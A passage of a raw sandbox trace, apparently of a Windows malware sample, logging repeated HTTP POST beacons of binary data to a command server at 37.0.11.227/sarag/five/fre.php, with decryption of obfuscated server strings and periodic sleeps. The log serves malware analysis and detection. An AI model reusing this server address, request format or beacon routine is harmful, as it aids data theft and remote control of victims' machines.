GetProcessHeap () returned 0x690000 [0344.864] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0344.864] socket (af=2, type=1, protocol=6) returned 0xc80 [0344.865] connect (s=0xc80, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0344.891] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0344.891] GetProcessHeap () returned 0x690000 [0344.891] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0344.891] GetProcessHeap () returned 0x690000 [0344.891] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0344.894] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0344.895] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0344.895] GetProcessHeap () returned 0x690000 [0344.895] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0344.895] GetProcessHeap () returned 0x690000 [0344.896] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0344.896] GetProcessHeap () returned 0x690000 [0344.896] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0344.896] GetProcessHeap () returned 0x690000 [0344.896] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0344.897] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0344.898] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0344.898] GetProcessHeap () returned 0x690000 [0344.898] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0344.898] GetProcessHeap () returned 0x690000 [0344.898] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0344.899] send (s=0xc80, buf=0x6ad508*, len=242, flags=0) returned 242 [0344.899] send (s=0xc80, buf=0x6aba40*, len=159, flags=0) returned 159 [0344.899] GetProcessHeap () returned 0x690000 [0344.899] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0344.899] recv (in: s=0xc80, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0344.988] GetProcessHeap () returned 0x690000 [0344.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0344.989] GetProcessHeap () returned 0x690000 [0344.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0344.989] GetProcessHeap () returned 0x690000 [0344.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0344.989] GetProcessHeap () returned 0x690000 [0344.990] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0344.990] closesocket (s=0xc80) returned 0 [0344.990] GetProcessHeap () returned 0x690000 [0344.990] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0344.990] GetProcessHeap () returned 0x690000 [0344.991] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0344.991] GetProcessHeap () returned 0x690000 [0344.991] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0344.991] GetProcessHeap () returned 0x690000 [0344.992] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0344.992] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19d0) returned 0xc80 [0344.994] Sleep (dwMilliseconds=0xea60) [0344.996] GetProcessHeap () returned 0x690000 [0344.996] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0344.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.997] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0345.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.004] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0345.026] GetProcessHeap () returned 0x690000 [0345.026] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0345.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.029] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0345.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.030] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0345.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.031] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0345.031] GetProcessHeap () returned 0x690000 [0345.031] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0345.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.033] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0345.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.036] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0345.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.043] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0345.043] GetProcessHeap () returned 0x690000 [0345.043] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0345.044] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.044] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0345.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.045] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0345.046] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.046] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0345.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.048] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0345.049] GetProcessHeap () returned 0x690000 [0345.049] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0345.049] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0345.049] GetProcessHeap () returned 0x690000 [0345.049] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0345.052] GetProcessHeap () returned 0x690000 [0345.053] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0345.053] GetProcessHeap () returned 0x690000 [0345.053] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0345.053] GetProcessHeap () returned 0x690000 [0345.053] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0345.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.054] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0345.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.062] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0345.067] GetProcessHeap () returned 0x690000 [0345.067] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0345.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.068] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0345.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.069] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0345.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.070] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0345.070] GetProcessHeap () returned 0x690000 [0345.071] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0345.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.074] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0345.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.074] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0345.075] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.075] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0345.075] GetProcessHeap () returned 0x690000 [0345.075] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0345.076] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.077] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0345.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.078] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0345.078] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.079] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0345.080] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.080] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0345.080] GetProcessHeap () returned 0x690000 [0345.080] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0345.080] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0345.080] GetProcessHeap () returned 0x690000 [0345.080] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0345.080] socket (af=2, type=1, protocol=6) returned 0xc84 [0345.081] connect (s=0xc84, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0345.105] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0345.107] GetProcessHeap () returned 0x690000 [0345.107] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0345.107] GetProcessHeap () returned 0x690000 [0345.107] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0345.108] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0345.109] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0345.109] GetProcessHeap () returned 0x690000 [0345.109] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0345.109] GetProcessHeap () returned 0x690000 [0345.109] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0345.110] GetProcessHeap () returned 0x690000 [0345.110] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0345.110] GetProcessHeap () returned 0x690000 [0345.110] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0345.111] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0345.112] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0345.112] GetProcessHeap () returned 0x690000 [0345.112] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0345.112] GetProcessHeap () returned 0x690000 [0345.112] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0345.112] send (s=0xc84, buf=0x6ad508*, len=242, flags=0) returned 242 [0345.113] send (s=0xc84, buf=0x6aba40*, len=159, flags=0) returned 159 [0345.113] GetProcessHeap () returned 0x690000 [0345.113] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0345.113] recv (in: s=0xc84, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0345.197] GetProcessHeap () returned 0x690000 [0345.198] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0345.198] GetProcessHeap () returned 0x690000 [0345.198] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0345.199] GetProcessHeap () returned 0x690000 [0345.199] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0345.199] GetProcessHeap () returned 0x690000 [0345.199] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0345.199] closesocket (s=0xc84) returned 0 [0345.200] GetProcessHeap () returned 0x690000 [0345.201] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0345.201] GetProcessHeap () returned 0x690000 [0345.201] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0345.201] GetProcessHeap () returned 0x690000 [0345.201] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0345.201] GetProcessHeap () returned 0x690000 [0345.202] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0345.202] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19d4) returned 0xc84 [0345.206] Sleep (dwMilliseconds=0xea60) [0345.208] GetProcessHeap () returned 0x690000 [0345.208] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0345.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.210] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0345.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.231] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0345.266] GetProcessHeap () returned 0x690000 [0345.266] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0345.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.269] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0345.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.270] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0345.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.272] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0345.272] GetProcessHeap () returned 0x690000 [0345.272] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0345.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.273] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0345.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.279] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0345.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.280] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0345.280] GetProcessHeap () returned 0x690000 [0345.280] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0345.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.281] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0345.282] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.282] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0345.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.284] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0345.285] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.285] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0345.285] GetProcessHeap () returned 0x690000 [0345.285] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0345.285] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0345.286] GetProcessHeap () returned 0x690000 [0345.286] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0345.286] GetProcessHeap () returned 0x690000 [0345.286] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0345.287] GetProcessHeap () returned 0x690000 [0345.287] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0345.287] GetProcessHeap () returned 0x690000 [0345.287] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0345.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.290] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0345.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.296] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0345.304] GetProcessHeap () returned 0x690000 [0345.305] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0345.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.306] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0345.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.307] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0345.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.308] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0345.308] GetProcessHeap () returned 0x690000 [0345.309] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0345.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.311] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0345.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.312] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0345.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.313] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0345.313] GetProcessHeap () returned 0x690000 [0345.313] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0345.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.314] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0345.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.315] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0345.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.317] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0345.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.318] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0345.318] GetProcessHeap () returned 0x690000 [0345.318] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0345.318] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0345.318] GetProcessHeap () returned 0x690000 [0345.318] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0345.318] socket (af=2, type=1, protocol=6) returned 0xc88 [0345.319] connect (s=0xc88, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0345.343] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0345.343] GetProcessHeap () returned 0x690000 [0345.343] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0345.343] GetProcessHeap () returned 0x690000 [0345.343] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0345.344] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0345.344] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: 